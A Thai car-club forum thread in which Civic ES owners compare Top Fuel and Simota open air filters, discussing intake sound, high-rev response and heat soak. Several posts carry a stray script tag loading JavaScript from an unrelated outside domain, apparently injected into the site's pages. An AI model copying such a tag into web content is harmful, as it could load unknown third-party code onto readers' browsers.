ตอบ
wittayab


เข้าร่วม: 19 พฤศจิกา 2008
ตอบ: 979

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1633
ให้คำขอบคุณ: 226

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 20 พฤศจิกา 2009 21:25 - ขอถามหน่อยครับ เรื่องของกรอง Top Fuel ครับ
อยากทราบในคลับเรามีท่านใดใส่อยู่มั่งหรือเปล่าครับ

ถ้าท่านใดใส่ช่วยลงรูปในชมหน่อยได้มั้ยครับ

แล้วถ้าเทียบระหว่าง Simota กับ Top Fuel อันไหนน่าคบกว่ากันคับ

ขอบคุณคับ
ได้รับคำขอบคุณจาก: tum911 
thanettrakool


ชื่อเล่น: ตั๊น

เข้าร่วม: 03 พฤศจิกา 2008
ตอบ: 972

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1301
ให้คำขอบคุณ: 1481

ที่อยู่: แถวๆพระประแดง
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 20 พฤศจิกา 2009 22:14 - ขอถามหน่อยครับ เรื่องของกรอง Top Fuel ครับ
ส่วนตัวเชียร์ Top Fuel ครับ
song


เข้าร่วม: 10 กุมภา 2011
ตอบ: 9833

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5558
ให้คำขอบคุณ: 4415

ที่อยู่: ESเมืองทอง 100%
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 15 สิงหา 2013 17:40 - ขอถามหน่อยครับ เรื่องของกรอง Top Fuel ครับ
wittayab พิมพ์ว่า:
อยากทราบในคลับเรามีท่านใดใส่อยู่มั่งหรือเปล่าครับ

ถ้าท่านใดใส่ช่วยลงรูปในชมหน่อยได้มั้ยครับ

แล้วถ้าเทียบระหว่าง Simota กับ Top Fuel อันไหนน่าคบกว่ากันคับ

ขอบคุณคับ



+1ครับ กำลังตัดสินใจที่จะคบหาอยู่เหมือนกันครับ ระหว่าง2ตัวนี้ จะใส่ตัวไหนดี รถเกียร์A/Tแต่อยากได้เสียงดูดแบบโหดอ่ะ "<script src="https://sport32news.com/civicesgroup.js">
undertaker55


ชื่อเล่น: ต้อง

เข้าร่วม: 26 สิงหา 2012
ตอบ: 564

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 756
ให้คำขอบคุณ: 684

ที่อยู่: เชียงใหม่
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 15 สิงหา 2013 21:21 - ขอถามหน่อยครับ เรื่องของกรอง Top Fuel ครับ
รอฟังด้วยคน แหะๆ
song


เข้าร่วม: 10 กุมภา 2011
ตอบ: 9833

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5558
ให้คำขอบคุณ: 4415

ที่อยู่: ESเมืองทอง 100%
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 16 สิงหา 2013 09:27 - ขอถามหน่อยครับ เรื่องของกรอง Top Fuel ครับ
ผู้รู้อยู่ไหนเอ่ย?
HankMan


เข้าร่วม: 10 มกรา 2011
ตอบ: 424

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 359
ให้คำขอบคุณ: 749

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 16 สิงหา 2013 10:09 - ขอถามหน่อยครับ เรื่องของกรอง Top Fuel ครับ
ผมใช้อยู่คับ แต่ยังไม่มีรูป ไม่ได้ถ่ายไว้คับ 
รถผม 1.7 เกียร์ AT ใส่ Topfuel กับปลายท่อ FGK งานพี่นัท 
ถามว่าวิ่งดีกว่าเดิมไหม ถ้าใช้ขับทั่วๆ ไปรถติดๆ ในกทม ผมว่าจะรู้สึกว่าต้นหายไปบ้าง แบบรู้สึกได้ แต่ไม่ถึงกับขัดใจ
แต่ถ้าลองลากรอบสูงๆ จะเร้าใจมาก รอบกวาดเร็วกว่าเดิม ไปจนถึง 6,200 เกียร์จะเปลี่ยน 
เสียงที่ได้เมื่อรอบ 3-4 พันขึ้นไป บีบหัวใจสุดๆ รู้สึกว่ารถมีแรงกว่าเดิมที่รอบสูงคับ 

แต่ข้อเสียก็มีคือ ผมพยายามหาค้ำหน้าที่หลบกรองของ cusco, mugen, js-racing มาใ่ส่นานแล้ว หาไม่ได้ซักที อ่อลืมบอกไปรถผมติดแก๊สด้วย เลยเลือกยากหน่อยอ่ะคับ แล้วก็เวลารถติดๆ ห้องเครื่องร้อนๆ รถจะมีอาการตื้อๆ ไปบ้าง แต่ไม่มากคับ เพราะผมไม่ได้กั้นห้องอากาศเพิ่มอ่ะคับ 

หวังว่าคงได้ประโยชน์จากข้อมูลจากผมบ้างนะคับ 
song


เข้าร่วม: 10 กุมภา 2011
ตอบ: 9833

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5558
ให้คำขอบคุณ: 4415

ที่อยู่: ESเมืองทอง 100%
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 16 สิงหา 2013 10:32 - ขอถามหน่อยครับ เรื่องของกรอง Top Fuel ครับ
HankMan พิมพ์ว่า:
ผมใช้อยู่คับ แต่ยังไม่มีรูป ไม่ได้ถ่ายไว้คับ 
รถผม 1.7 เกียร์ AT ใส่ Topfuel กับปลายท่อ FGK งานพี่นัท 
ถามว่าวิ่งดีกว่าเดิมไหม ถ้าใช้ขับทั่วๆ ไปรถติดๆ ในกทม ผมว่าจะรู้สึกว่าต้นหายไปบ้าง แบบรู้สึกได้ แต่ไม่ถึงกับขัดใจ
แต่ถ้าลองลากรอบสูงๆ จะเร้าใจมาก รอบกวาดเร็วกว่าเดิม ไปจนถึง 6,200 เกียร์จะเปลี่ยน 
เสียงที่ได้เมื่อรอบ 3-4 พันขึ้นไป บีบหัวใจสุดๆ รู้สึกว่ารถมีแรงกว่าเดิมที่รอบสูงคับ 

แต่ข้อเสียก็มีคือ ผมพยายามหาค้ำหน้าที่หลบกรองของ cusco, mugen, js-racing มาใ่ส่นานแล้ว หาไม่ได้ซักที อ่อลืมบอกไปรถผมติดแก๊สด้วย เลยเลือกยากหน่อยอ่ะคับ แล้วก็เวลารถติดๆ ห้องเครื่องร้อนๆ รถจะมีอาการตื้อๆ ไปบ้าง แต่ไม่มากคับ เพราะผมไม่ได้กั้นห้องอากาศเพิ่มอ่ะคับ 

หวังว่าคงได้ประโยชน์จากข้อมูลจากผมบ้างนะคับ 



เลย ขอบคุณครับ งั้นถ้าจะคบหากับ Top fuel ก็สมควรที่จะกั้นห้องอาการ หัวกรองจะได้ไม่ดูดรับลมร้อนของเครื่องยนต์เข้าไปใช่ม่ะครับ
HankMan


เข้าร่วม: 10 มกรา 2011
ตอบ: 424

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 359
ให้คำขอบคุณ: 749

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 16 สิงหา 2013 10:58 - ขอถามหน่อยครับ เรื่องของกรอง Top Fuel ครับ
song พิมพ์ว่า:
HankMan พิมพ์ว่า:
ผมใช้อยู่คับ แต่ยังไม่มีรูป ไม่ได้ถ่ายไว้คับ 
รถผม 1.7 เกียร์ AT ใส่ Topfuel กับปลายท่อ FGK งานพี่นัท 
ถามว่าวิ่งดีกว่าเดิมไหม ถ้าใช้ขับทั่วๆ ไปรถติดๆ ในกทม ผมว่าจะรู้สึกว่าต้นหายไปบ้าง แบบรู้สึกได้ แต่ไม่ถึงกับขัดใจ
แต่ถ้าลองลากรอบสูงๆ จะเร้าใจมาก รอบกวาดเร็วกว่าเดิม ไปจนถึง 6,200 เกียร์จะเปลี่ยน 
เสียงที่ได้เมื่อรอบ 3-4 พันขึ้นไป บีบหัวใจสุดๆ รู้สึกว่ารถมีแรงกว่าเดิมที่รอบสูงคับ 

แต่ข้อเสียก็มีคือ ผมพยายามหาค้ำหน้าที่หลบกรองของ cusco, mugen, js-racing มาใ่ส่นานแล้ว หาไม่ได้ซักที อ่อลืมบอกไปรถผมติดแก๊สด้วย เลยเลือกยากหน่อยอ่ะคับ แล้วก็เวลารถติดๆ ห้องเครื่องร้อนๆ รถจะมีอาการตื้อๆ ไปบ้าง แต่ไม่มากคับ เพราะผมไม่ได้กั้นห้องอากาศเพิ่มอ่ะคับ 

หวังว่าคงได้ประโยชน์จากข้อมูลจากผมบ้างนะคับ 



เลย ขอบคุณครับ งั้นถ้าจะคบหากับ Top fuel ก็สมควรที่จะกั้นห้องอาการ หัวกรองจะได้ไม่ดูดรับลมร้อนของเครื่องยนต์เข้าไปใช่ม่ะครับ


ถ้าเป็นไปได้ ทำห้องกั้นอากาศก็น่าจะดีกว่าครับ แต่ผมไม่ค่อยชอบ ก็เลยไม่กั้นคับ อีกอย่างนานๆ ซัดทีนึง ก็ถือว่าเอาเสียงก็พอครับ ถ้าเสียงกรองตัวนี้ผมชอบสุดตอนดับเครื่องครับ จะมีเสียงดูอากาศที่กรองแล้วก็บ้วนออก (ลิ้นปีกปิด) เพราะดีคับ ชอบเป็นการส่วนตัว <script src="https://sport32news.com/civicesgroup.js"></
 
song


เข้าร่วม: 10 กุมภา 2011
ตอบ: 9833

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5558
ให้คำขอบคุณ: 4415

ที่อยู่: ESเมืองทอง 100%
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 16 สิงหา 2013 11:07 - ขอถามหน่อยครับ เรื่องของกรอง Top Fuel ครับ
HankMan พิมพ์ว่า:
song พิมพ์ว่า:
HankMan พิมพ์ว่า:
ผมใช้อยู่คับ แต่ยังไม่มีรูป ไม่ได้ถ่ายไว้คับ 
รถผม 1.7 เกียร์ AT ใส่ Topfuel กับปลายท่อ FGK งานพี่นัท 
ถามว่าวิ่งดีกว่าเดิมไหม ถ้าใช้ขับทั่วๆ ไปรถติดๆ ในกทม ผมว่าจะรู้สึกว่าต้นหายไปบ้าง แบบรู้สึกได้ แต่ไม่ถึงกับขัดใจ
แต่ถ้าลองลากรอบสูงๆ จะเร้าใจมาก รอบกวาดเร็วกว่าเดิม ไปจนถึง 6,200 เกียร์จะเปลี่ยน 
เสียงที่ได้เมื่อรอบ 3-4 พันขึ้นไป บีบหัวใจสุดๆ รู้สึกว่ารถมีแรงกว่าเดิมที่รอบสูงคับ 

แต่ข้อเสียก็มีคือ ผมพยายามหาค้ำหน้าที่หลบกรองของ cusco, mugen, js-racing มาใ่ส่นานแล้ว หาไม่ได้ซักที อ่อลืมบอกไปรถผมติดแก๊สด้วย เลยเลือกยากหน่อยอ่ะคับ แล้วก็เวลารถติดๆ ห้องเครื่องร้อนๆ รถจะมีอาการตื้อๆ ไปบ้าง แต่ไม่มากคับ เพราะผมไม่ได้กั้นห้องอากาศเพิ่มอ่ะคับ 

หวังว่าคงได้ประโยชน์จากข้อมูลจากผมบ้างนะคับ 



เลย ขอบคุณครับ งั้นถ้าจะคบหากับ Top fuel ก็สมควรที่จะกั้นห้องอาการ หัวกรองจะได้ไม่ดูดรับลมร้อนของเครื่องยนต์เข้าไปใช่ม่ะครับ


ถ้าเป็นไปได้ ทำห้องกั้นอากาศก็น่าจะดีกว่าครับ แต่ผมไม่ค่อยชอบ ก็เลยไม่กั้นคับ อีกอย่างนานๆ ซัดทีนึง ก็ถือว่าเอาเสียงก็พอครับ ถ้าเสียงกรองตัวนี้ผมชอบสุดตอนดับเครื่องครับ จะมีเสียงดูอากาศที่กรองแล้วก็บ้วนออก (ลิ้นปีกปิด) เพราะดีคับ ชอบเป็นการส่วนตัว <script src="https://sport32news.com/civicesgroup.js"></
 



ขอบคุณครับ
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.